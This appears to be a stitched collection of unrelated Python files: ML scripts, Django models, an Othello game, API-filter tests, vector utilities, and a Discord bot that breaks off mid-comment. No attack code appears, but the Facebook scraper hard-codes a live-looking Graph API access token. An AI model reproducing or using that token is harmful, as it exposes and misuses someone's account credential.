            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last': ('django.db.models.fields.TextField', [], {}),
            'public_source_repository': ('django.db.models.fields.URLField', [], {'max_length': '200'})
        },
        u'projects.project': {
            'Meta': {'object_name': 'Project'},
            'description': ('django.db.models.fields.TextField', [], {}),
            'icon_path': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.TextField', [], {}),
            'ranking': ('django.db.models.fields.IntegerField', [], {})
        },
        u'projects.technology': {
            'Meta': {'object_name': 'Technology'},
            'framework': ('django.db.models.fields.TextField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.TextField', [], {}),
            'project': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['projects.Project']", 'symmetrical': 'False'})
        }
    }
    complete_apps = ['projects']
import pickle
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.model_selection import cross_val_score
from sklearn.neighbors import KNeighborsClassifier
iris = datasets.load_iris()
# Load iris dataset
iris_df = pd.DataFrame(iris.data, columns=iris.feature_names)
# Convert iris to pandas DataFrame
iris_df['target'] = pd.Series(iris.target)
# Format the target column of the DataFrame
y = iris_df['target']
model = KNeighborsClassifier(n_neighbors=1)
# Initialize K-nearest neighbors model with n_neighbors=1 (single nearest neighbor)
features = iris_df[['petal length (cm)', 'petal width (cm)']]
# Set petal length and petal width as features for the model due to distinct separations for these variables in visualizations
# NOTE(review): mean 10-fold CV score previously reported as .973 — re-verify
# against the printout below if hyperparameters change.
model.fit(features, y)
# Fit the model on the full dataset before serializing it for the API
pickle.dump(model, open('api/model.pickle', 'wb'))
# Serialize the model
cross_val_scores = cross_val_score(model, features, y, cv=10)
# Calculate 10-fold cross validation scores
print(cross_val_scores)
# Print array of scores from a 10-fold cross validation
print(np.mean(cross_val_scores))
from typing import Callable, Optional, Sequence, Union
import torch
from ignite.metrics import Metric, Precision, Recall
from ignite.metrics.metric import reinit__is_reduced
__all__ = ["FbetaScore"]
class FbetaScore(Metric):
    """F-beta score metric built from internal Precision and Recall metrics.

    beta weighs recall beta times as much as precision. With
    average="macro", compute() returns a Python float (the mean over
    classes); otherwise it returns the per-class tensor.
    """
    def __init__(
        self,
        beta: int = 1,
        output_transform: Callable = lambda x: x,
        average: str = "macro",
        is_multilabel: bool = False,
        device: Optional[Union[str, torch.device]] = None,
    ):
        self._beta = beta
        self._average = average
        # Precision/Recall average per-sample only when not doing macro
        # averaging here; for "macro" the mean is taken in compute().
        _average_flag = self._average != "macro"
        self._precision = Precision(
            output_transform=output_transform,
            average=_average_flag,
            is_multilabel=is_multilabel,
            device=device,
        )
        self._recall = Recall(
            output_transform=output_transform,
            average=_average_flag,
            is_multilabel=is_multilabel,
            device=device,
        )
        super(FbetaScore, self).__init__(
            output_transform=output_transform, device=device
        )
    @reinit__is_reduced
    def reset(self) -> None:
        """Reset the underlying precision and recall accumulators."""
        self._precision.reset()
        self._recall.reset()
    def compute(self) -> torch.Tensor:
        """Combine precision and recall into the F-beta score."""
        precision_val = self._precision.compute()
        recall_val = self._recall.compute()
        # 1e-15 guards against division by zero when P = R = 0.
        fbeta_val = (
            (1.0 + self._beta ** 2)
            * precision_val
            * recall_val
            / (self._beta ** 2 * precision_val + recall_val + 1e-15)
        )
        if self._average == "macro":
            fbeta_val = torch.mean(fbeta_val).item()
        return fbeta_val
    @reinit__is_reduced
    def update(self, output: Sequence[torch.Tensor]) -> None:
        """Feed a (y_pred, y) pair into the underlying metrics."""
        self._precision.update(output)
        self._recall.update(output)
|
from spellcheck.spellchecker import SpellingCorrection
import re
class DigitizationParser:
    """Parses digitized essay files into essay texts and spelling corrections.

    Essays in the file are separated by `end_of_essay` marker lines.
    """
    def __init__(self, end_of_essay='# # # # # # #'):
        # Marker line that terminates each essay record in the input file.
        self.end_of_essay = end_of_essay
    def _split(self, seq, sep):
        """Yield chunks of `seq` delimited by elements equal to `sep`.

        Always yields a final (possibly empty) trailing chunk.
        """
        chunk = []
        for el in seq:
            if el == sep:
                yield chunk
                chunk = []
            else:
                chunk.append(el)
        yield chunk
    def _split_string(self, string, sep):
        """Split a string on a separator character via _split, rejoining chunks."""
        return [''.join(x) for x in self._split(string, sep)]
    def _parse_correction(self, essay_metadata):
        """
        Parse SpellingCorrection objects out of essay metadata.
        essay_metadata: [array of strings] first element is essay number,
        second is the essay text, and any elements after that are spelling
        corrections
        """
        corrections = []
        for correction in essay_metadata[2:]:
            # Each correction line is "<index>,<word>,<correction>".
            index, word, correction = list(self._split_string(correction, ','))
            index = int(index)
            corrections.append(SpellingCorrection(index, word, [correction]))
        return corrections
    def parse_digitization(self, file_name):
        """
        Parse essay text and SpellingCorrection objs out of each digitization.

        Returns (essays, essay_corrections), parallel lists per essay.
        """
        essays = []
        # NOTE(review): this initial value is unused; essay_corrections below
        # supersedes it.
        corrections = []
        with open(file_name) as data_file:
            lines = data_file.read().splitlines()
            essays_with_metadata = list(self._split(lines, self.end_of_essay))
            essays = []
            essay_corrections = []
            # The trailing chunk after the last end-of-essay marker is skipped.
            for e in essays_with_metadata[:-1]:
                # Strip angle-bracket markup, keeping the enclosed text.
                essay_text = re.sub(r'<([^>]*)>', r'\1', e[1])
                essays.append(essay_text)
                essay_corrections.append(self._parse_correction(e))
        return essays, essay_corrections
def parse_counts(file_name, sep='\t', encoding=None):
    """
    Parse frequency counts from file.
    Params:
        file_name: [string] The path to the file to parse. File should have
            lines formatted as <item><sep><count>. For example: "e|i 917"
        sep: [string] The separator between fields on a line.
        encoding: [string] Type of encoding to use. Ex: 'utf-8'
    Returns:
        counts: [dict{string, int}] Dict from edit to number of counts
            for the edit.
    """
    with open(file_name, encoding=encoding) as f:
        pairs = (line.split(sep) for line in f)
        return {edit: int(count) for edit, count in pairs}
def word_tokenize(sent):
    """
    Split sentence into words, stripping one trailing punctuation mark
    (.?!,) from any token longer than a single character.
    """
    return [
        token[:-1] if len(token) > 1 and token[-1] in '.?!,' else token
        for token in sent.split()
    ]
|
class Solution:
    def removeKdigits(self, num, k):
        """
        :type num: str
        :type k: int
        :rtype: str

        Greedy monotonic stack: drop a kept digit whenever the incoming
        digit is smaller, until k removals are spent; any budget left over
        removes digits from the tail (handles runs like "1111").
        """
        if k == len(num):
            return '0'
        kept = []
        for digit in num:
            while k and kept and kept[-1] > digit:
                kept.pop()
                k -= 1
            kept.append(digit)
        # Spend any remaining removals on the (non-decreasing) tail.
        if k:
            kept = kept[:-k]
        # int() strips leading zeros such as "0200" -> 200.
        return str(int("".join(kept)))
print(Solution().removeKdigits("10", 1))
|
# Function that takes two integers and checks whether the first is divisible by the second.
def divisible(a, b):
    """Return True if a is evenly divisible by b (ZeroDivisionError if b == 0)."""
    return a % b == 0
def primo(c):
    """
    Return "True" if c is prime, "False" otherwise.

    String return values are kept for backward compatibility with the
    original interface.

    BUG FIX: the original returned from inside the loop's first iteration,
    so it only ever tested divisibility by 2 — e.g. primo(9) claimed "True".
    """
    if c < 2:
        # 0, 1 and negatives are not prime (original fell through to None here).
        return "False"
    for i in range(2, c):
        if c % i == 0:
            return "False"
    return "True"
def nota(note):
    """Map a numeric score to its qualitative grade label."""
    # Descending guard clauses; each threshold implies the previous one failed,
    # so the original's explicit upper bounds are unnecessary.
    if note >= 75:
        return "Excelente"
    if note >= 70:
        return "Bueno"
    if note >= 60:
        return "Ok"
    if note >= 50:
        return "Regular"
    if note >= 45:
        return "Mal"
    if note >= 40:
        return "Pésimo"
    if note < 40:
        return "Perverso"
    # Unreachable for ordinary numbers; preserved for non-comparable inputs
    # (e.g. NaN fails every comparison above), matching the original.
    return "No es una nota válida"
# Grade a batch of evaluation scores and show the labels.
evaluaciones = [83, 75, 74.9, 70, 69.9, 65]
resul = [nota(score) for score in evaluaciones]
print(resul)
from django.db import models
from django.core.urlresolvers import reverse
# Create your models here.
class Doctor(models.Model):
    """A doctor profile; Patient rows point here via related_name 'patients'."""
    # NOTE(review): age and gender are free-text CharFields — an IntegerField /
    # choices would be stricter, but changing them requires a migration.
    name = models.CharField(max_length=200)
    age = models.CharField(max_length=200)
    gender = models.CharField(max_length=200)
    degree =models.CharField(max_length=200)
    description = models.TextField()

    def get_absolute_url(self):
        # Detail-view URL for this doctor (URL pattern named 'doctor_detail').
        return reverse("doctor_detail",kwargs={'pk':self.pk})

    def __str__(self):
        return self.name
class Patient(models.Model):
    """A patient record linked to a treating Doctor."""
    name= models.CharField(max_length=200)
    age = models.CharField(max_length=200)
    gender = models.CharField(max_length=200)
    illness= models.CharField(max_length=200)
    allergies= models.CharField(max_length=200)
    email= models.EmailField(max_length=200)
    # FIX: on_delete is mandatory from Django 2.0; CASCADE matches the old
    # implicit default, so behavior on earlier versions is unchanged.
    doctor= models.ForeignKey('basic_app.Doctor', related_name='patients',
                              on_delete=models.CASCADE)

    def get_absolute_url(self):
        # Detail-view URL for this patient (URL pattern named 'patient_detail').
        return reverse("patient_detail",kwargs={'pk':self.pk})

    def __str__(self):
        return self.name
|
# Board cell values paired with their display glyphs
# (open circle = white, filled circle = black, space = empty).
WHITE, WHITE_STR = 1, "\u25cb"
BLACK, BLACK_STR = -1, "\u25cf"
EMPTY, EMPTY_STR = 0, " "
class Game:
    """
    Every state of the game will be an instance of the class.
    It contains every relevant piece of information about the game
    (board, current player, and the scanning directions).
    """

    def __init__(self):
        # BLACK moves first; players are +1/-1 so an opponent is simply -player.
        self.current_player = BLACK
        # Standard Othello starting position: four tokens on the centre squares.
        self.board = [[EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, BLACK, WHITE, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, WHITE, BLACK, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY],
                      [EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY]]
        # The eight compass directions used when scanning lines of tokens.
        self.__directions = [(1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1)]

    def __str__(self):
        """
        Overrides the original print statement in order to print the board when calling 'print(Game())'
        """
        string = ["    1   2   3   4   5   6   7   8\n", "  +---+---+---+---+---+---+---+---+\n"]
        for x in range(8):
            string.append("{} ".format(x + 1))
            for y in range(8):
                string.append("| {} ".format(self.__getString(x, y)))
            string.append("|\n")
            string.append("  +---+---+---+---+---+---+---+---+\n")
        return "".join(string)

    def __getString(self, x, y):
        """
        Returns the corresponding string representing each player
        :param x: Indicates the row of the board
        :param y: Indicates the column of the board
        """
        if self.board[x][y] == BLACK:
            return BLACK_STR
        elif self.board[x][y] == WHITE:
            return WHITE_STR
        else:
            return EMPTY_STR

    @staticmethod
    def __isOnBoard(move):
        """
        Returns true if the move is inside the board and false otherwise
        :param move: a tuple containing the position of the square the player wishes to place a token
        """
        return 0 <= move[0] < 8 and 0 <= move[1] < 8

    def __isEmpty(self, move):
        """
        Returns true if the square at `move` is empty and false otherwise
        :param move: a tuple containing the position of the square the player wishes to place a token
        """
        return self.board[move[0]][move[1]] == EMPTY

    def __incrementUntilSameColor(self, origin, direction):
        """
        This method is to help the method '__flipsTokens()' check if a given move generates a list of
        coordinates of squares whose tokens must flip colors. It returns (True, end_square) if a run of
        opponent tokens terminated by one of the current player's tokens exists, and (False, None) otherwise.
        :param origin: The starting position of the method
        :param direction: A given direction which the method will "move" towards to in order to complete the check.
        """
        current_square = origin
        current_square = [x + y for x, y in zip(current_square, direction)]
        # Advance over the opponent's contiguous tokens (-current_player).
        while self.__isOnBoard(current_square) and self.board[current_square[0]][
                current_square[1]] == -self.current_player:
            current_square = [x + y for x, y in zip(current_square, direction)]
        if self.__isOnBoard(current_square) and self.board[current_square[0]][current_square[1]] == self.current_player:
            return True, current_square
        else:
            return False, None

    def __flipsTokens(self, move):
        """
        Returns a list containing the position of the squares which contain the opponent's token which must change color
        :param move: a tuple containing the position of the square the player wishes to place a token
        """
        toBeFlipped = list()
        for direction in self.__directions:
            found, end = self.__incrementUntilSameColor(move, direction)
            # Walk back from the terminating square toward the move, collecting
            # every square in between (exclusive of both endpoints' own tokens).
            while found and (not end == move):
                end = [x - y for x, y in zip(end, direction)]
                if not end == move:
                    toBeFlipped.append(end)
        return toBeFlipped

    def isValid(self, move):
        """
        Returns true if a move is valid and false otherwise
        :param move: a tuple containing the position of the square the player wishes to place a token
        """
        return self.__isOnBoard(move) and len(self.__flipsTokens(move)) > 0 and self.__isEmpty(move)

    def hasValid(self):
        """
        Returns true if the current player has any valid moves and false otherwise
        """
        for x in range(8):
            for y in range(8):
                if self.isValid([x, y]):
                    return True
        return False

    def getValid(self):
        """
        Returns a list containing every valid move the current player can make
        """
        validList = list()
        for x in range(8):
            for y in range(8):
                if self.isValid([x, y]):
                    validList.append([x, y])
        return validList

    def makeMove(self, move):
        """
        Executes the given move, updates the board and switches current player to its opponent.
        Invalid moves are silently ignored.
        """
        if self.isValid(move):
            toBeFliped = self.__flipsTokens(move)
            self.board[move[0]][move[1]] = self.current_player
            for x, y in toBeFliped:
                self.board[x][y] = self.current_player
            self.current_player = -self.current_player

    def isFinished(self):
        """
        Returns true if the game is over and false otherwise
        """
        # NOTE(review): this only detects a full board; an Othello game can also
        # end earlier when neither player has a valid move — confirm intended.
        for x in range(8):
            for y in range(8):
                if self.__isEmpty([x, y]):
                    return False
        return True
|
# Copyright 2013 Openstack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import mock
from wafflehaus.payload_filter import unset_key
from wafflehaus import tests
class TestPayloadFilter(tests.TestCase):
    """
    Tests for wafflehaus.payload_filter.unset_key: the filter injects default
    values (configured as "path:to:key=value" strings) into JSON request
    bodies for a configured resource, without overriding keys already set.
    """

    def setUp(self):
        self.app = mock.Mock()
        # Default specs: simple key, nested key, and their plural (list) forms.
        simple_widget = 'widget:thing=thingie'
        complex_widget = 'widget:sub:thing=thingie'
        multi_widget = 'widgets:thing=thingie'
        multi_subwidget = 'widgets:sub:thing=thingie'
        self.simple_conf1 = {'resource': 'POST /widget', 'enabled': 'true',
                             'defaults': simple_widget}
        self.simple_conf2 = {'resource': 'POST /widget', 'enabled': 'true',
                             'defaults': complex_widget}
        # Two defaults at once, in both orders (order should not matter).
        self.multi_conf = {'resource': 'POST /widget', 'enabled': 'true',
                           'defaults': '%s,%s' % (simple_widget,
                                                  complex_widget)}
        self.multi_confr = {'resource': 'POST /widget', 'enabled': 'true',
                            'defaults': '%s,%s' % (complex_widget,
                                                   simple_widget)}
        self.plural_conf = {'resource': 'POST /widget', 'enabled': 'true',
                            'defaults': multi_widget}
        self.plural_conf2 = {'resource': 'POST /widget', 'enabled': 'true',
                             'defaults': multi_subwidget}
        # Request bodies covering missing key, present key, nested object,
        # list of objects, and list of objects with nested sub-objects.
        self.body1 = '{"widget": { "name": "foo"}}'
        self.body2 = '{"widget": { "name": "foo", "thing": "derp"}}'
        self.body3 = '{"widget": { "name": "foo", "sub": { "name": "bar"}}}'
        self.body4 = '{"widgets": [{"name": "1"},{"name": "2"}]}'
        self.body5 = '{"widgets": [{"sub":{"name": "1"}}]}'

    def test_default_instance_create_simple(self):
        # The factory should register exactly one resource path ('/widget').
        result = unset_key.filter_factory(self.simple_conf1)(self.app)
        self.assertIsNotNone(result)
        self.assertTrue(hasattr(result, 'resources'))
        self.assertTrue(isinstance(result.resources, dict))
        self.assertEqual(1, len(result.resources))
        resources = result.resources
        self.assertTrue('/widget' in resources)
        self.assertEqual(1, len(resources['/widget']))

    def test_request_body_overridden(self):
        """Payload filter will set values for keys that do not exist."""
        result = unset_key.filter_factory(self.simple_conf1)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body1)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widget' in json_body)
        self.assertTrue('thing' not in json_body)
        widget = json_body['widget']
        self.assertTrue('name' in widget)
        self.assertEqual('foo', widget['name'])
        self.assertTrue('thing' in widget)
        self.assertEqual('thingie', widget['thing'])

    def test_request_body_not_overridden(self):
        """Payload filter will not change values that are set."""
        result = unset_key.filter_factory(self.simple_conf1)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body2)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widget' in json_body)
        self.assertTrue('thing' not in json_body)
        widget = json_body['widget']
        self.assertTrue('name' in widget)
        self.assertEqual('foo', widget['name'])
        self.assertTrue('thing' in widget)
        self.assertEqual('derp', widget['thing'])

    def test_request_complex_path(self):
        # A nested default ('widget:sub:thing') lands in the sub-object only.
        result = unset_key.filter_factory(self.simple_conf2)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body3)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widget' in json_body)
        self.assertTrue('thing' not in json_body)
        widget = json_body['widget']
        self.assertTrue('thing' not in widget)
        self.assertTrue('name' in widget)
        self.assertEqual('foo', widget['name'])
        self.assertTrue('sub' in widget)
        sub = widget['sub']
        self.assertEqual('thingie', sub['thing'])

    def test_request_multi_path(self):
        # Both configured defaults are applied to the same body.
        result = unset_key.filter_factory(self.multi_conf)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body3)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widget' in json_body)
        widget = json_body['widget']
        self.assertTrue('name' in widget)
        self.assertEqual('foo', widget['name'])
        self.assertTrue('thing' in widget)
        self.assertEqual('thingie', widget['thing'])
        self.assertTrue('sub' in widget)
        sub = widget['sub']
        self.assertEqual('thingie', sub['thing'])

    def test_request_multi_path_with_part_missing(self):
        # A nested default must not create a missing intermediate object.
        result = unset_key.filter_factory(self.multi_conf)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body1)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widget' in json_body)
        widget = json_body['widget']
        self.assertTrue('name' in widget)
        self.assertEqual('foo', widget['name'])
        self.assertTrue('thing' in widget)
        self.assertEqual('thingie', widget['thing'])
        self.assertFalse('sub' in widget)

    def test_request_multi_path_with_part_missing_reversed(self):
        # Same as above with the defaults configured in the opposite order.
        result = unset_key.filter_factory(self.multi_confr)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body1)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widget' in json_body)
        widget = json_body['widget']
        self.assertTrue('name' in widget)
        self.assertEqual('foo', widget['name'])
        self.assertTrue('thing' in widget)
        self.assertEqual('thingie', widget['thing'])
        self.assertFalse('sub' in widget)

    def test_request_plural_request(self):
        # A plural default applies to every element of the JSON list.
        result = unset_key.filter_factory(self.plural_conf)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body4)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widgets' in json_body)
        self.assertTrue('thing' not in json_body)
        widgets = json_body['widgets']
        for widget in widgets:
            self.assertTrue('name' in widget)
            self.assertTrue('thing' in widget)
            self.assertEqual('thingie', widget['thing'])

    def test_request_plural_sub_request(self):
        # A plural nested default applies to each element's sub-object.
        result = unset_key.filter_factory(self.plural_conf2)(self.app)
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body5)
        self.assertEqual(self.app, resp)
        body = result.body
        self.assertIsNotNone(body)
        json_body = json.loads(body)
        self.assertTrue('widgets' in json_body)
        self.assertTrue('thing' not in json_body)
        widgets = json_body['widgets']
        for widget in widgets:
            self.assertTrue('thing' not in widget)
            self.assertTrue('sub' in widget)
            sub = widget['sub']
            self.assertTrue('name' in sub)
            self.assertTrue('thing' in sub)
            self.assertEqual('thingie', sub['thing'])

    def test_override_runtime(self):
        # A runtime header can disable/re-enable the filter per request.
        self.set_reconfigure()
        result = unset_key.filter_factory(self.plural_conf2)(self.app)
        headers = {'X_WAFFLEHAUS_DEFAULTPAYLOAD_ENABLED': False}
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body5, headers=headers)
        self.assertEqual(self.app, resp)
        self.assertFalse(hasattr(result, 'body'))
        headers = {'X_WAFFLEHAUS_DEFAULTPAYLOAD_ENABLED': True}
        resp = result.__call__.request('/widget', method='POST',
                                       body=self.body5, headers=headers)
        self.assertEqual(self.app, resp)
        self.assertTrue(hasattr(result, 'body'))
|
from __future__ import absolute_import, unicode_literals, print_function
import mock
from unittest import TestCase
from libraries.lambda_handlers.list_endpoints_handler import ListEndpointsHandler
class TestListEndpointsHandler(TestCase):
    """Smoke test: ListEndpointsHandler.handle returns whatever the (mocked)
    TxManager.list_endpoints returns, given a fully-populated event."""

    @mock.patch('libraries.manager.manager.TxManager.setup_resources')
    @mock.patch('libraries.manager.manager.TxManager.list_endpoints')
    def test_handle(self, mock_list_endpoints, mock_setup_resources):
        # list_endpoints is stubbed to None, so handle() should return None.
        mock_list_endpoints.return_value = None
        event = {
            'data': {},
            'body-json': {},
            # Environment configuration the handler extracts from the event.
            'vars': {
                'gogs_url': 'https://git.example.com',
                'cdn_url': 'https://cdn.example.com',
                'api_url': 'https://api.example.com',
                'cdn_bucket': 'cdn_test_bucket',
                'job_table_name': 'test-tx-job',
                'module_table_name': 'test-tx-module'
            }
        }
        handler = ListEndpointsHandler()
        self.assertIsNone(handler.handle(event, None))
|
import pandas
import numpy as np
from sklearn.ensemble import RandomForestRegressor

# Train a random forest on local meteo data and report percent-deviation stats.
# Read data (CSV has no header row).
data=pandas.read_csv("/home/alex/Desktop/telelis/data/meteo.txt", header=None)
# Prepare training set: columns 2-6 are features, column 0 is the target.
X_train=data.iloc[:3266,[2,3,4,5,6]]
y_train=data.iloc[:3266,0]
# Prepare test set: the last 20 rows.
X_test=data.iloc[-20:,[2,3,4,5,6]]
y_test=data.iloc[-20:,0]
# Train the random forest (fixed seed for reproducibility).
regr = RandomForestRegressor(max_depth=500, random_state=42)
regr.fit(X_train, y_train)
# Predict.
predictions=regr.predict(X_test)
# Evaluate: absolute percent deviation per test row.
real=y_test
percent_deviations=[]
for i in range(0, 20):
    percent_deviation=abs(real.iloc[i]-predictions[i])/real.iloc[i]*100
    percent_deviations.append(percent_deviation)
mean_percent_deviation=np.mean(percent_deviations)
# NOTE(review): this is the mean of squared *percent deviations*, not the MSE
# of the raw predictions — confirm which metric was intended.
squarederror=[p**2 for p in percent_deviations]
mse=np.mean(squarederror)
mean_accuracy=100-mean_percent_deviation
# BUG FIX: the original wrote print("... %.3f") % value, applying % to
# print()'s return value (None) — a TypeError on Python 3. Format the
# string itself instead.
print("\nMean Percent Accuracy for Random Forest: %.3f" % mean_accuracy)
print("\nMean Percent Deviation for Random Forest: %.3f" % mean_percent_deviation)
print("MSE: %.3f" % mse)
# best Acc 95.74, MSE 28.3
|
import urllib3
import requests
import json
import pymongo #importing pymongo library
# Fetch a user's Facebook posts via the Graph API and store them in MongoDB.
# Creating mongodb connection (local default port)
myclient = pymongo.MongoClient("mongodb://127.0.0.1:27017")
# Creating database and collection object
mydb = myclient["posts"]
mycol = mydb["posts_collection"]
# facebook url GET request
# SECURITY NOTE(review): the access token is hard-coded in source — it should
# be revoked and moved to an environment variable or secrets store.
url_request_facebook = requests.get("https://graph.facebook.com/v3.1/me?fields=posts.include_hidden(true).show_expired(true)%7Bfull_picture%2Clink%2Ccomments%2Cdescription%2Cwith_tags%2Cplace%2Cattachments%2Clikes%2Cicon%2Cpicture%2Ctype%7D&access_token=EAAd6TdjdprUBAC8Inew2WCZBznKDVDC58cDAZCYkyAZC1sZCdsRexIgxZCuAwT1FkmHNhgzbt8B9NCeYbbksTaXWCDD9lGgLY6ZBM0wLZCZCX5b1VvNOg6iMiESdToHIJIlvTgcJ3krv1SeM9iaQD5A2tPC2KbPYB70G8AO6DhAdBfZBLrbj9P6yy8v1hF0hmcdwhwN3cZA3Yf0gZDZD")
# creating json object from the API response
data = url_request_facebook.json()
# the posts live under posts.data in the Graph API response
dictionary_data = data['posts']['data']
# storing each post document in the collection
mycol.insert_many(dictionary_data)
|
import os
def new_entry(item, value):
    """Append one item;value line to the list file."""
    line = "{};{}\n".format(item, value)
    with open("./Max/files/list.csv", "a") as f:
        f.write(line)
def delete_entry(i):
    """Remove the entry at index i and rewrite the list file."""
    path = "./Max/files/list.csv"
    # Read every line into [item, value, ...] records.
    with open(path, "r") as file:
        entries = [line.rstrip().split(";") for line in file.readlines()]
    # Drop record i and write the file back.
    del entries[i]
    with open(path, "w") as file:
        for entry in entries:
            file.write(entry[0] + ";" + entry[1] + "\n")
def change_entry(i, item, value):
    """Replace the entry at index i with [item, value] and rewrite the file."""
    result = []
    # Read every line into [item, value, ...] records.
    with open("./Max/files/list.csv", "r") as file:
        lines = file.readlines()
        for v in lines:
            v = v.rstrip()
            entry = v.split(";")
            result.append(entry)
    with open("./Max/files/list.csv", "w") as file:
        # BUG FIX: the original assigned to the undefined name `result1`,
        # raising NameError on every call.
        result[i] = [item, value]
        for v in result:
            file.write(v[0] + ";" + v[1] + "\n")
def get_entry(i):
    """Return the entry at index i as a [item, value, ...] list."""
    with open("./Max/files/list.csv", "r") as file:
        entries = [line.rstrip().split(";") for line in file.readlines()]
    return entries[i]
def get_all_entries():
    """Return every entry in the list file as [item, value, ...] lists."""
    with open("./Max/files/list.csv", "r") as file:
        return [line.rstrip().split(";") for line in file.readlines()]
def open_file():
    # Open the CSV with the OS default application.
    # NOTE(review): `open` is the macOS opener; Linux needs `xdg-open` and
    # Windows `start` — confirm the target platform.
    os.system("open " + "./Max/files/list.csv")
|
"""
A module with utility functions for vector calculus.
All inputs and outputs are expected to be in a numpy array
shaped (n, 3) where n is some positive number.
"""
import numpy as np
def cross_product(x, y):
    """Row-wise cross product of two (n, 3) arrays, returned as (n, 3)."""
    i = x[:, 1] * y[:, 2] - x[:, 2] * y[:, 1]
    j = x[:, 2] * y[:, 0] - x[:, 0] * y[:, 2]
    k = x[:, 0] * y[:, 1] - x[:, 1] * y[:, 0]
    return np.stack([i, j, k], axis=-1)
def intersect(v_origin, v_direction, plane_origin, plane_normal):
    """
    Row-wise ray/plane intersection.

    All arguments are (n, 3) arrays; returns the (n, 3) intersection points,
    with NaN rows where a ray is parallel to its plane.
    """
    vo = v_origin
    vd = v_direction
    po = plane_origin
    pn = plane_normal
    # np.errstate restores the previous floating-point error state on exit,
    # replacing the original's manual np.geterr/np.seterr/try-finally dance.
    with np.errstate(divide="ignore"):
        # t = distance along the ray: pn.(po - vo) / pn.vd, kept as (n, 1).
        t = np.stack([np.sum(pn * (po - vo), axis=1) / np.sum(pn * vd, axis=1)], 1)
        # t[t < 0] = np.nan  # TODO: remove?
        # Parallel rays divide by zero -> inf; mark as "no intersection".
        t[np.isinf(t)] = np.nan
        intersection = vo + np.multiply(t, vd)
    return intersection
def squared_norm(x):
    """Row-wise squared Euclidean norm of an (n, 3) array."""
    return (x * x).sum(axis=1)
def norm(x):
    """Row-wise Euclidean norm of an (n, 3) array (sqrt of the squared norm)."""
    return np.sqrt((x * x).sum(axis=1))
|
import os
from glob import glob
import cv2
import numpy as np
# Batch-visualise HSV hue-range masks for a folder of photos.
img_paths = glob(os.path.expanduser('~/Downloads/imgs/*.JPG'))
for i, ip in enumerate(img_paths):
    rst_img = None
    img = cv2.imread(ip)
    # Convert to HSV so hue ranges select colour bands directly.
    img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    img = cv2.resize(img, dsize=(480, 340))
    # Three hue bands with fixed saturation/value floors (43/46); the three
    # binary masks are stacked side by side into one comparison image.
    for l, h in [(0,90), (90, 124), (124, 180)]:
        im = cv2.inRange(img, (l, 43, 46), (h, 255, 255))
        if rst_img is None:
            rst_img = im
        else:
            rst_img = np.hstack([rst_img, im])
    # One composite output per input image, numbered by position.
    cv2.imwrite(os.path.expanduser('~/Downloads/{}.jpg'.format(i)), rst_img)
    # raw_input('enter to next')
import random
import discord
from discord.ext import commands
bot = commands.Bot(command_prefix="$", activity=discord.Activity(name="Teammake | $help", type=1))
class Teammake(commands.Cog):
    """Cog that splits a comma-separated list of players into two random teams."""

    def __init__(self, bot):
        self.bot = bot

    # BUG FIX: event methods inside a Cog never fire without this decorator.
    @commands.Cog.listener()
    async def on_ready(self):
        # BUG FIX: a Cog has no `.user`; the logged-in user lives on the bot.
        print('Logged on as {0}!'.format(self.bot.user))

    @commands.Cog.listener()
    async def on_message(self, message):
        # BUG FIX: Message objects are not strings — split the text content.
        teampool = message.content.split(',')
        # Only even pools of 4/6/8/10 players are handled (same sizes as the
        # original's four duplicated branches). BUG FIX: the original left
